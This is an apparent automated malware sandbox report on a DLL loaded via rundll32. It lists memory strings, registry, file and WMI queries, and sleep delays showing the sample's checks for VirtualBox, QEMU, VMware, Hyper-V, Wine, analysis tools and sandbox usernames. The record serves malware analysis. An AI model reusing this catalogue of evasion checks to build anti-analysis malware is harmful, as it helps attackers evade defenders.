                    Source: rundll32.exe, rundll32.exe, 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: rundll32.exe Binary or memory string: QEMU-GA.EXE
                    Source: rundll32.exe Binary or memory string: VMUSRVC.EXE
                    Source: rundll32.exe Binary or memory string: REGMON.EXE
                    Source: rundll32.exe Binary or memory string: WINDBG.EXE
                    Source: rundll32.exe Binary or memory string: AUTORUNS.EXE
                    Source: rundll32.exe Binary or memory string: IMPORTREC.EXE
                    Source: rundll32.exe Binary or memory string: PETOOLS.EXE
                    Source: rundll32.exe Binary or memory string: SNIFF_HIT.EXE
                    Source: rundll32.exe Binary or memory string: PROC_ANALYZER.EXE
                    Source: rundll32.exe Binary or memory string: JOEBOXCONTROL.EXE
                    Source: rundll32.exe, 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: '\\.\VBOXMINIRDRDN\\.\VBOXGUEST\\.\PIPE\VBOXMINIRDDN\\.\VBOXTRAYIPC\\.\PIPE\VBOXTRAYIPCCHECKING DEVICE %S VBOXTRAYTOOLWNDCLASSVBOXTRAYTOOLWNDVIRTUALBOX SHARED FOLDERSVBOXSERVICE.EXEVBOXTRAY.EXECHECKING VIRTUALBOX PROCESS %S SELECT * FROM WIN32_NETWORKADAPTERCONFIGURATIONMACADDRESS08:00:27VBOXVIDEOVBOXVIDEOW8VBOXWDDMSELECT * FROM WIN32_NTEVENTLOGFILEFILENAMESYSTEMSOURCESVIRTUALBOXVBOXVBOXSELECT * FROM WIN32_PNPENTITYDEVICEIDPCI\VEN_80EE&DEV_CAFENAME82801FB82441FX82371SBOPENHCDSELECT * FROM WIN32_BUSACPIBUS_BUS_0PCI_BUS_0PNP_BUS_0SELECT * FROM WIN32_BASEBOARDPRODUCTVIRTUALBOXMANUFACTURERORACLE CORPORATIONSELECT * FROM WIN32_PNPDEVICECAPTIONPNPDEVICEIDVEN_VBOXQEMUQEMU-GA.EXEVDAGENT.EXEVDSERVICE.EXECHECKING QEMU PROCESSES %S QEMU-GASPICE GUEST TOOLSCHECKING QEMU DIRECTORY %S QEMUQEMUBOCHSBXPCWINE_GET_UNIX_FILE_NAMESOFTWARE\WINESYSTEM\CONTROLSET001\SERVICES\VIOSCSISYSTEM\CONTROLSET001\SERVICES\VIOSTORSYSTEM\CONTROLSET001\SERVICES\VIRTIO-FS SERVICESYSTEM\CONTROLSET001\SERVICES\VIRTIOSERIALSYSTEM\CONTROLSET001\SERVICES\BALLOONSYSTEM\CONTROLSET001\SERVICES\BALLOONSERVICESYSTEM\CONTROLSET001\SERVICES\NETKVMSYSTEM32\DRIVERS\BALLOON.SYSSYSTEM32\DRIVERS\NETKVM.SYSSYSTEM32\DRIVERS\PVPANIC.SYSSYSTEM32\DRIVERS\VIOFS.SYSSYSTEM32\DRIVERS\VIOGPUDO.SYSSYSTEM32\DRIVERS\VIOINPUT.SYSSYSTEM32\DRIVERS\VIORNG.SYSSYSTEM32\DRIVERS\VIOSCSI.SYSSYSTEM32\DRIVERS\VIOSER.SYSSYSTEM32\DRIVERS\VIOSTOR.SYSVIRTIO-WIN\CURRENTUSERSANDBOXEMILYHAPUBWSHONG LEEIT-ADMINJOHNSONMILLERMILOZSPETER WILSONTIMMYSAND BOXMALWAREMALTESTTEST USERVIRUSJOHN DOECHECKING IF USERNAME MATCHES : %S VMWARESELECT * FROM WIN32_COMPUTERSYSTEMMODELHVM DOMUPROCEXP64.EXEPRL_CC.EXEPRL_TOOLS.EXECHECKING PARALLELS PROCESSES: %S
                    Source: rundll32.exe, 00000002.00000003.333797150.000001B97EC0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000003.333897258.0000021EF3D7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >VMSRVC.EXECHECKING VIRTUAL PC PROCESSES %S VMUSRVC.EXE
                    Source: rundll32.exe Binary or memory string: SYSANALYZER.EXE
                    Source: rundll32.exe Binary or memory string: IDAQ.EXE
                    Source: rundll32.exe Binary or memory string: DUMPCAP.EXE
                    Source: rundll32.exe Binary or memory string: WIRESHARK.EXE
                    Source: rundll32.exe Binary or memory string: FILEMON.EXE
                    Source: C:\Windows\System32\rundll32.exe Code function: VBOX VBOX VEN_VBOX 3_2_0000021EF301F9C0
                    Source: C:\Windows\System32\rundll32.exe Code function: qemu-ga qemu-ga Checking QEMU directory %s Checking QEMU directory %s 3_2_0000021EF301FE00
                    Source: C:\Windows\System32\rundll32.exe Code function: VBoxTrayToolWndClass VBoxTrayToolWnd 3_2_0000021EF301DCE2
                    Source: C:\Windows\System32\rundll32.exe Code function: qemu-ga.exe qemu-ga.exe Checking qemu processes %s Checking qemu processes %s 3_2_0000021EF301FD40
                    Source: C:\Windows\System32\rundll32.exe Code function: QEMU QEMU 3_2_0000021EF301FC50
                    Source: C:\Windows\System32\rundll32.exe Code function: System32\drivers\VBoxMouse.sys System32\drivers\VBoxGuest.sys System32\drivers\VBoxSF.sys System32\drivers\VBoxVideo.sys System32\vboxdisp.dll System32\vboxhook.dll System32\vboxmrxnp.dll System32\vboxogl.dll System32\vboxoglarrayspu.dll System32\vboxoglcrutil.dll System32\vboxoglerrorspu.dll System32\vboxoglfeedbackspu.dll System32\vboxoglpackspu.dll System32\vboxoglpassthroughspu.dll System32\vboxservice.exe System32\vboxservice.exe System32\vboxtray.exe System32\VBoxControl.exe 3_2_0000021EF301E430
                    Source: C:\Windows\System32\rundll32.exe Code function: HARDWARE\ACPI\DSDT\VBOX__ HARDWARE\ACPI\FADT\VBOX__ HARDWARE\ACPI\RSDT\VBOX__ SYSTEM\ControlSet001\Services\VBoxGuest SYSTEM\ControlSet001\Services\VBoxMouse SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxSF SYSTEM\ControlSet001\Services\VBoxVideo 3_2_0000021EF301E2E0
                    Source: C:\Windows\System32\rundll32.exe Code function: vboxservice.exe vboxservice.exe vboxtray.exe 3_2_0000021EF301E990
                    Source: C:\Windows\System32\rundll32.exe Code function: \\.\VBoxMiniRdrDN \\.\VBoxGuest \\.\pipe\VBoxMiniRdDN \\.\VBoxTrayIPC \\.\pipe\VBoxTrayIPC 3_2_0000021EF301E7D0
                    Source: C:\Windows\System32\rundll32.exe Code function: vboxvideo VBoxVideoW8 VBoxWddm 3_2_0000021EF301EC20
                    Source: C:\Windows\System32\rundll32.exe Code function: vbox VBOX 3_2_0000021EF301EFD0
                    Source: C:\Windows\System32\rundll32.exe Code function: vbox VBOX 3_2_0000021EF301EF51
                    Source: C:\Windows\System32\rundll32.exe Code function: qemu qemu QEMU QEMU 3_2_0000021EF301FFE0
                    Source: C:\Windows\System32\rundll32.exe Code function: HARDWARE\ACPI\DSDT\VBOX__ HARDWARE\ACPI\FADT\VBOX__ HARDWARE\ACPI\RSDT\VBOX__ SYSTEM\ControlSet001\Services\VBoxGuest SYSTEM\ControlSet001\Services\VBoxMouse SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxSF SYSTEM\ControlSet001\Services\VBoxVideo 4_2_000001C33871E2E0
                    Source: C:\Windows\System32\rundll32.exe Code function: System32\drivers\VBoxMouse.sys System32\drivers\VBoxGuest.sys System32\drivers\VBoxSF.sys System32\drivers\VBoxVideo.sys System32\vboxdisp.dll System32\vboxhook.dll System32\vboxmrxnp.dll System32\vboxogl.dll System32\vboxoglarrayspu.dll System32\vboxoglcrutil.dll System32\vboxoglerrorspu.dll System32\vboxoglfeedbackspu.dll System32\vboxoglpackspu.dll System32\vboxoglpassthroughspu.dll System32\vboxservice.exe System32\vboxservice.exe System32\vboxtray.exe System32\VBoxControl.exe 4_2_000001C33871E430
                    Source: C:\Windows\System32\rundll32.exe Code function: \\.\VBoxMiniRdrDN \\.\VBoxGuest \\.\pipe\VBoxMiniRdDN \\.\VBoxTrayIPC \\.\pipe\VBoxTrayIPC 4_2_000001C33871E7D0
                    Source: C:\Windows\System32\rundll32.exe Code function: VBOX VBOX VEN_VBOX 4_2_000001C33871F9C0
                    Source: C:\Windows\System32\rundll32.exe Code function: QEMU QEMU 4_2_000001C33871FC50
                    Source: C:\Windows\System32\rundll32.exe Code function: VBoxTrayToolWndClass VBoxTrayToolWnd 4_2_000001C33871DCE2
                    Source: C:\Windows\System32\rundll32.exe Code function: qemu-ga.exe qemu-ga.exe Checking qemu processes %s Checking qemu processes %s 4_2_000001C33871FD40
                    Source: C:\Windows\System32\rundll32.exe Code function: qemu-ga qemu-ga Checking QEMU directory %s Checking QEMU directory %s 4_2_000001C33871FE00
                    Source: C:\Windows\System32\rundll32.exe Code function: vboxservice.exe vboxservice.exe vboxtray.exe 4_2_000001C33871E990
                    Source: C:\Windows\System32\rundll32.exe Code function: vboxvideo VBoxVideoW8 VBoxWddm 4_2_000001C33871EC20
                    Source: C:\Windows\System32\rundll32.exe Code function: qemu qemu QEMU QEMU 4_2_000001C33871FFE0
                    Source: C:\Windows\System32\rundll32.exe Code function: vbox VBOX 4_2_000001C33871EF51
                    Source: C:\Windows\System32\rundll32.exe Code function: vbox VBOX 4_2_000001C33871EFD0
                    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
                    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
                    Source: C:\Windows\System32\loaddll64.exe TID: 3368 Thread sleep time: -120000s >= -30000s
                    Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\rundll32.exe File opened / queried: VBoxGuest
                    Source: C:\Windows\System32\rundll32.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
                    Source: C:\Windows\System32\rundll32.exe File opened / queried: C:\Windows\System32\drivers\VBoxSF.sys
                    Source: C:\Windows\System32\rundll32.exe File opened / queried: VBoxTrayIPC
                    Source: C:\Windows\System32\rundll32.exe File opened / queried: C:\Windows\System32\vboxtray.exe
                    Source: C:\Windows\System32\rundll32.exe File opened / queried: C:\Windows\System32\vboxhook.dll
                    Source: C:\Windows\System32\rundll32.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDate
                    Source: C:\Windows\System32\rundll32.exe File opened / queried: C:\Windows\System32\drivers\VBoxGuest.sys
                    Source: C:\Windows\System32\rundll32.exe File opened / queried: C:\Windows\System32\drivers\VBoxVideo.sys
                    Source: C:\Windows\System32\rundll32.exe File opened / queried: \pipe\VBoxTrayIPC
                    Source: C:\Windows\System32\rundll32.exe File opened / queried: C:\Windows\System32\drivers\VBoxMouse.sys
                    Source: C:\Windows\System32\rundll32.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Windows\System32\rundll32.exe File opened / queried: VBoxMiniRdrDN
                    Source: C:\Windows\System32\rundll32.exe File opened / queried: C:\Windows\System32\vboxservice.exe
                    Source: C:\Windows\System32\rundll32.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Windows\System32\rundll32.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,3_2_0000021EF3020FD0
                    Source: C:\Windows\System32\rundll32.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,4_2_000001C338720FD0
                    Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
                    Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 45000
                    Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 33000
                    Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 38000
                    Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 44000
                    Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 42000
                    Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 41000
                    Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 37000
                    Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 39000
                    Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 30000
                    Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-47723
                    Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-47705
                    Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-47982
                    Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-58885
                    Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-58678
                    Source: rundll32.exeBinary or memory string: Checking qemu processes %s
                    Source: rundll32.exeBinary or memory string: qemu-ga.exe
                    Source: rundll32.exeBinary or memory string: \\.\VBoxMiniRdrDN
                    Source: rundll32.exeBinary or memory string: VBoxTrayToolWnd
                    Source: rundll32.exeBinary or memory string: \\.\VBoxTrayIPC
                    Source: rundll32.exeBinary or memory string: VBoxTrayToolWndClass
                    Source: rundll32.exe, 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '\\.\VBoxMiniRdrDN\\.\VBoxGuest\\.\pipe\VBoxMiniRdDN\\.\VBoxTrayIPC\\.\pipe\VBoxTrayIPCChecking device %s VBoxTrayToolWndClassVBoxTrayToolWndVirtualBox Shared Foldersvboxservice.exevboxtray.exeChecking VirtualBox process %s SELECT * FROM Win32_NetworkAdapterConfigurationMACAddress08:00:27vboxvideoVBoxVideoW8VBoxWddmSELECT * FROM Win32_NTEventlogFileFileNameSystemSourcesVirtualBoxvboxVBOXSELECT * FROM Win32_PnPEntityDeviceIdPCI\VEN_80EE&DEV_CAFEName82801FB82441FX82371SBOpenHCDSELECT * FROM Win32_BusACPIBus_BUS_0PCI_BUS_0PNP_BUS_0SELECT * FROM Win32_BaseBoardProductVirtualBoxManufacturerOracle CorporationSELECT * FROM Win32_PnPDeviceCaptionPNPDeviceIDVEN_VBOXQEMUqemu-ga.exevdagent.exevdservice.exeChecking qemu processes %s qemu-gaSPICE Guest ToolsChecking QEMU directory %s qemuQEMUBOCHSBXPCwine_get_unix_file_nameSOFTWARE\WineSYSTEM\ControlSet001\Services\vioscsiSYSTEM\ControlSet001\Services\viostorSYSTEM\ControlSet001\Services\VirtIO-FS ServiceSYSTEM\ControlSet001\Services\VirtioSerialSYSTEM\ControlSet001\Services\BALLOONSYSTEM\ControlSet001\Services\BalloonServiceSYSTEM\ControlSet001\Services\netkvmSystem32\drivers\balloon.sysSystem32\drivers\netkvm.sysSystem32\drivers\pvpanic.sysSystem32\drivers\viofs.sysSystem32\drivers\viogpudo.sysSystem32\drivers\vioinput.sysSystem32\drivers\viorng.sysSystem32\drivers\vioscsi.sysSystem32\drivers\vioser.sysSystem32\drivers\viostor.sysVirtio-Win\CurrentUserSandboxEmilyHAPUBWSHong LeeIT-ADMINJohnsonMillermilozsPeter Wilsontimmysand boxmalwaremaltesttest uservirusJohn DoeChecking if username matches : %s VMWareSELECT * FROM Win32_ComputerSystemModelHVM domUprocexp64.exeprl_cc.exeprl_tools.exeChecking Parallels processes: %s
                    Source: rundll32.exeBinary or memory string: System32\drivers\VBoxMouse.sys
                    Source: rundll32.exeBinary or memory string: VMUSrvc.exe
                    Source: rundll32.exeBinary or memory string: qemu-ga
                    Source: rundll32.exeBinary or memory string: System32\drivers\VBoxGuest.sys
                    Source: rundll32.exe, 00000002.00000003.345380383.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.345473164.000001B97C37E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348219875.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348291878.0000021EF14F1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.354650341.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.354730046.000001C336C3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
                    Source: rundll32.exe, 00000003.00000003.355338249.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
                    Source: rundll32.exe, 00000004.00000003.365598019.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.365622335.000001C336C46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.362004087.000001C336C46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.359859619.000001C336C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: rundll32.exe, 00000003.00000003.350037322.0000021EF14C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349110139.0000021EF14C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348130642.0000021EF14C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.355122911.0000021EF14C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.351928065.0000021EF14C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348704806.0000021EF14C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.778857843.0000021EF14C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.354220320.0000021EF14C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349620502.0000021EF14C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HMicrosoft-Windows-Hyper-V-HypervisorM
                    Source: rundll32.exeBinary or memory string: System32\vboxservice.exe
                    Source: rundll32.exe, 00000002.00000003.345454368.000001B97C385000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.345380383.000001B97C373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V-Hyperv
                    Source: rundll32.exeBinary or memory string: \\.\VBoxGuest
                    Source: rundll32.exeBinary or memory string: vboxservice.exe
                    Source: rundll32.exe, 00000004.00000003.370328491.000001C336C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\qemu-ga
                    Source: rundll32.exeBinary or memory string: System32\vboxtray.exe
                    Source: rundll32.exe, 00000003.00000003.349675038.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348219875.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.354413918.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.351983402.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.779167810.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348743161.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.350087607.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.355338249.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349167458.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.357480625.000001C336C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HMicrosoft-Windows-Hyper-V-HypervisorHgy
                    Source: rundll32.exe, 00000002.00000003.352702307.000001B97C373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\qemu-ga7|
                    Source: rundll32.exeBinary or memory string: HARDWARE\ACPI\FADT\VBOX__
                    Source: rundll32.exe, 00000004.00000002.778981998.000001C336BE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr
                    Source: rundll32.exeBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: rundll32.exeBinary or memory string: vboxtray.exe
                    Source: rundll32.exe, 00000003.00000003.350087607.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityNECVMWar VMware SATA CD00{4d36e965-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityCD-ROM DriveSCSI\CDROM&VEN_NECVMWAR&PROD_EMPTKE44_SATA_CD00\5&280B647&0&000000System.String[](Standard CD-ROM drives)NECVMWar VMware SATA CD00CDROMSCSI\CDROM&VEN_NECVMWAR&PROD_M9OO6K3A_SATA_CD00\5&280B647&0&000000cdromOKWin32_ComputerSystemcomputerLMEMp
                    Source: rundll32.exe, 00000003.00000003.355338249.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityNECVMWar VMware SATA CD00{4d36e965-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityCD-ROM DriveSCSI\CDROM&VEN_NECVMWAR&PROD_EMPTKE44_SATA_CD00\5&280B647&0&000000System.String[](Standard CD-ROM drives)NECVMWar VMware SATA CD00CDROMSCSI\CDROM&VEN_NECVMWAR&PROD_M9OO6K3A_SATA_CD00\5&280B647&0&000000cdromOKWin32_ComputerSystemcomputerp
                    Source: rundll32.exe, 00000004.00000003.357480625.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.368055513.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.365598019.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.354650341.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.370667973.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.370328491.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.779240741.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.355521989.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.359859619.000001C336C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HMicrosoft-Windows-Hyper-V-Hypervisor
                    Source: rundll32.exe, 00000003.00000003.354413918.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iles\qemu-gaN
                    Source: rundll32.exeBinary or memory string: HARDWARE\ACPI\RSDT\VBOX__
                    Source: rundll32.exeBinary or memory string: \\.\pipe\VBoxTrayIPC
                    Source: rundll32.exeBinary or memory string: System32\vboxhook.dll
                    Source: rundll32.exeBinary or memory string: System32\vboxmrxnp.dll
                    Source: rundll32.exe, 00000002.00000003.349703575.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.345824476.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.345380383.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352990332.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.346257503.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.347331575.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352702307.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.346770799.000001B97C373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `HMicrosoft-Windows-Hyper-V-Hypervisor
                    Source: rundll32.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
                    Source: rundll32.exe, 00000003.00000003.348788520.0000021EF14FB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349200855.0000021EF14F9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349711381.0000021EF14FB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348255439.0000021EF14F4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.350087607.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.350109127.0000021EF14FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349167458.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348272281.0000021EF14F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cht4vbds-Hyper-V-Hyperv0
                    Source: rundll32.exe, 00000002.00000003.349703575.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.345824476.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.345380383.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352990332.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.346257503.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.347331575.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352702307.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.346770799.000001B97C373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HMicrosoft-Windows-Hyper-V-HypervisorppData\Locab
                    Source: rundll32.exe, 00000002.00000003.345454368.000001B97C385000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.345380383.000001B97C373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: intelppmHyper-V-Hyperv
                    Source: rundll32.exeBinary or memory string: VMSrvc.exe
                    Source: rundll32.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxGuest
                    Source: rundll32.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxService
                    Source: rundll32.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxMouse
                    Source: rundll32.exeBinary or memory string: VMWare
                    Source: rundll32.exeBinary or memory string: Checking QEMU directory %s
                    Source: rundll32.exe, 00000003.00000003.348788520.0000021EF14FB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349200855.0000021EF14F9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349711381.0000021EF14FB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348255439.0000021EF14F4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.779283722.0000021EF14FB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.350087607.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.355521210.0000021EF14FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.350109127.0000021EF14FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349167458.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.355366404.0000021EF14F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s-Hyper-V-Hyperv0
                    Source: rundll32.exe, 00000003.00000002.779283722.0000021EF14FB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.355521210.0000021EF14FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.355366404.0000021EF14F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t4vbds-Hyper-V-Hyperv0
                    Source: rundll32.exeBinary or memory string: System32\drivers\VBoxSF.sys
                    Source: rundll32.exe, 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >VMSrvc.exeChecking Virtual PC processes %s VMUSrvc.exe
                    Source: rundll32.exe, 00000003.00000002.778727508.0000021EF149E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxx
